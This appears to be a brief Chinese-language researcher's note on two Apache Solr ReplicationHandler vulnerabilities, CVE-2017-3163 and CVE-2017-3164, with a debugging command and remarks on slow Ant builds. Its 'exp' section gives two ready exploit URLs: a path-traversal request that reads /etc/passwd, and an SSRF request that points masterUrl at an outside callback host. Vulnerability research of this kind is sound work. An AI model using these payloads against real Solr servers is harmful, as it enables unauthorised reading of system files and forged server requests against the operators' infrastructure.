https://xz.aliyun.com/t/8374
Solr的ReplicationHandler
類對輸入數據數據處理不當,存在任意文件讀取和服務器請求僞造漏洞,涉及漏洞編號爲CVE-2017-3163
和CVE-2017-3164
有幾點感受
1 ant構建實在是太慢了,掛了代理也慢,主要時間不是花在下載上,而是resolve
2 結合idea進行調試的命令
./solr start -a "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=6666" -p 8983 -s "/Users/rai4over/Desktop/solr-6.0.0/solr/example/example-DIH/solr"
3 跟了下程序,感覺前面過於囉嗦,直接斷在解析命令跟進不同函數看即可
exp
讀文件
http://127.0.0.1:8983/solr/db/replication?command=filecontent&file=../../../../../../../../../../../../../etc/passwd&wt=filestream&generation=1
ssrf
http://127.0.0.1:8983/solr/db/replication?command=fetchindex&masterUrl=http://f422cd57.y7z.xyz/xxxx&wt=json&httpBasicAuthUser=aaa&httpBasicAuthPassword=bbb